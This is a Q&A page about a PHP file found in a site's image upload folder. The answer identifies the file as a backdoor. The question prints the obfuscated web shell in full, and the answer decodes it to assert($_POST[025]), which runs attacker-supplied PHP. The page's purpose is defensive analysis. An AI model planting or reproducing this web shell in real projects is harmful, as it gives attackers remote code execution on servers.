C 知道

消息
创作中心
douchao0358 2016-11-21 07:09
浏览 35
已采纳

我的上传文件夹中的未知PHP文件,是不是恶意代码?

Recently i found out my project got hacked and i found a script in my images folder which where a directory for user to upload their images (using file input). Here is the script that i found in the directory.

errot_db.php

<?php                  
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}                  
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);
?>
  • 写回答

1条回答 默认 最新

  • donglengyuan6826 2016-11-21 07:13
    关注

    This code hides the following statement:

    @assert ($_POST[025]);

    Which means it'll execute the PHP code send in the POST variable "025". So, yes, this is indeed a backdoor! I recommend asking on security.stackexchange.com for help on how to properly deal with the fallout.

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论
编辑
预览

报告相同问题?

  • PHP代码审计7—文件上传漏洞
    2022-08-01 09:06
    W0ngk的博客 文件上传基础整理与示例分析
  • PHP语言为基础的文件上传
    2024-05-08 09:14
    Ed3n的博客 文件,是 apache 服务器的一个配置文件,全称是 ...白名单:一般情况下,代码文件里会有一个数组或者列表,该数组或者列表里会包含一些合法的字符或者字符串,如果数据包中的文件后缀不符合白名单,就不允许上传。
  • 计算机病毒与恶意代码(第四版)-自用期末复习整理
    2025-01-05 09:30
    每天进步一点点km的博客 这类恶意代码通常会加密用户的数据资产(如文档、邮件、数据库、源代码、图片等),或者限制用户对设备的访问,然后向用户展示勒索信息,要求用户支付赎金以获取解密密钥或恢复设备访问权限。移动终端恶意代码以移动...
  • php如何删除文件夹里的图片,php如何删除文件
    2021-04-12 06:24
    weijie.tong的博客 php如何删除文件php删除文件夹的方法:首先创建一个PHP示例文件;然后通过“function deldir($dir) {...}”删除目录下的文件并删除当前文件夹即可。推荐:《PHP视频教程》php删除文件夹及其文件夹下所有文件...
  • php接收表单文件域控件_php表单文件iframe异步上传实例讲解
    2021-03-22 12:20
    只有三分钟的赛雷的博客 2.文件上传控件内容变化的时候触发JS设置表单的action为处理文件上传的img_upload_process.php文件,并且将表单的target设置为iframe,让iframe去提交到服务器进行文件上传;3.img_upload_process.php中处理文件上传...
  • 漠岚PHP投票程序(内测版) v0.1.0.rar
    2019-07-04 08:45
    这个文件夹包含了所有必要的程序文件和资源,如数据库配置、PHP脚本、样式表以及可能的JavaScript代码。解压后,用户需要通过web服务器访问到"install.php"文件,按照提示进行安装。安装过程中通常会涉及以下步骤: ...
  • PHP 文件上传工具类
    2018-01-18 13:19
    houyanhua1的博客 Upload.class.php: <?php class Upload{ private $path; //文件上传目录 private $max_size; //上传文件大小限制 ... private $mime = array('image/jpeg','image/png','image/gif');//允许上传的文件类型
  • php学习
    2022-04-14 09:51
    拓海AE的博客 PHP 文件可包含文本、HTML、JavaScript代码和 PHP 代码 PHP 代码在服务器上执行,结果以纯 HTML 形式返回给浏览器 PHP 文件的默认文件扩展名是 “.phpPHP 能做什么? PHP 可以生成动态页面内
  • 1-Web安全——文件上传漏洞
    2020-08-20 14:45
    song->_->的博客 一般用户在上传文件时,如果web应用程序的代码没有对上传的文件进行严格的校验和过滤时,容易出现允许上传任意文件的情况,然后恶意攻击者利用这一点上传恶意脚本文件(aspx,php,jsp等文件)到服务器,从而获取...
  • 精通 PHP 设计模式(四)
    2024-07-28 16:42
    绝不原创的飞龙的博客 在这一章中,我试图解决一些问题。我们通过学习 HTTP 来讨论了一些网络开发的方面。除此之外,我们还学习了如何有效地设计 RESTful API。这本书现在要结束了;让我们重新审视一些使我们的代码变得伟大的核心价值观:...
  • 没有解决我的问题, 去提问
手机看
程序员都在用的中文IT技术交流社区

程序员都在用的中文IT技术交流社区

专业的中文 IT 技术社区,与千万技术人共成长

专业的中文 IT 技术社区,与千万技术人共成长

关注【CSDN】视频号,行业资讯、技术分享精彩不断,直播好礼送不停!

关注【CSDN】视频号,行业资讯、技术分享精彩不断,直播好礼送不停!

 客服 返回
顶部